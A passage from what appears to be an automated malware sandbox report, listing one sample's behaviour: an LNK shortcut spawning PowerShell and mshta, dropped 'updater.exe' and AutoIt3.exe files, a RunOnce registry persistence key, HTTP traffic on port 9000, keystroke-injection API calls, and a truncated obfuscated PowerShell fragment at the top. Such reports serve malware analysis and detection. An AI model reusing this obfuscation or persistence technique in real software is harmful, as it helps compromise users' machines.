_).Value.Name-ilike'nl*a'}).Name).Invoke((GCI Variable:\s).Value)\|ForEach{(Get-Item Variable:/_).Value-As'Char'}))))	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C2C6D9 LoadLibraryA,GetProcAddress,

27_2_00C2C6D9

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFAAC4E00BD pushad ; iretd	9_2_00007FFAAC4E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAAB4515E0 pushad ; ret	14_2_00007FFAAB45160D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAAB526FE4 pushad ; iretd	14_2_00007FFAAB526FE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAAB527B7B push ebp; iretd	14_2_00007FFAAB527B7D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAAB527972 push edi; iretd	14_2_00007FFAAB527974
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFAAB46792B push ebx; retf	16_2_00007FFAAB46796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFAAB468132 push ebx; ret	16_2_00007FFAAB46816A
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BD8B75 push ecx; ret	27_2_00BD8B88
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C7175 push 017C71A1h; ret	27_2_017C7199
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C9161 push 017C918Dh; ret	27_2_017C9185
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C515D push 017C5189h; ret	27_2_017C5181
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C713D push 017C7169h; ret	27_2_017C7161
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C713B push 017C7169h; ret	27_2_017C7161
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017CA1E9 push 017CA215h; ret	27_2_017CA20D
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017CA1E1 push 017CA215h; ret	27_2_017CA20D
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C61D1 push 017C624Eh; ret	27_2_017C6246
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C61CF push 017C624Eh; ret	27_2_017C6246
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017CA18E push 017CA215h; ret	27_2_017CA20D
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017B306D push 017B3099h; ret	27_2_017B3091
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C705D push 017C7089h; ret	27_2_017C7081
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C7025 push 017C7051h; ret	27_2_017C7049
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C70CD push 017C70F9h; ret	27_2_017C70F1
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C7095 push 017C70C1h; ret	27_2_017C70B9
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017B337D push 017B33A9h; ret	27_2_017B33A1
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017B337C push 017B33A9h; ret	27_2_017B33A1
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C5359 push 017C5385h; ret	27_2_017C537D
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C8359 push 017C8385h; ret	27_2_017C837D
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C5321 push 017C534Dh; ret	27_2_017C5345
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C53E9 push 017C5415h; ret	27_2_017C540D
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C53DD push 017C5415h; ret	27_2_017C540D
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C5391 push 017C53BDh; ret	27_2_017C53B5

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\mshta.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\27589682\updater.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	File created: C:\faggbgb\AutoIt3.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ggkfcbc
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ggkfcbc
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ggkfcbc
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ggkfcbc

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50083

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	27_2_00C359B3
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BC5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	27_2_00BC5EDA
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003C59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	29_2_003C59B3
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_00355EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	29_2_00355EDA

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00BD33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

27_2_00BD33B7

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
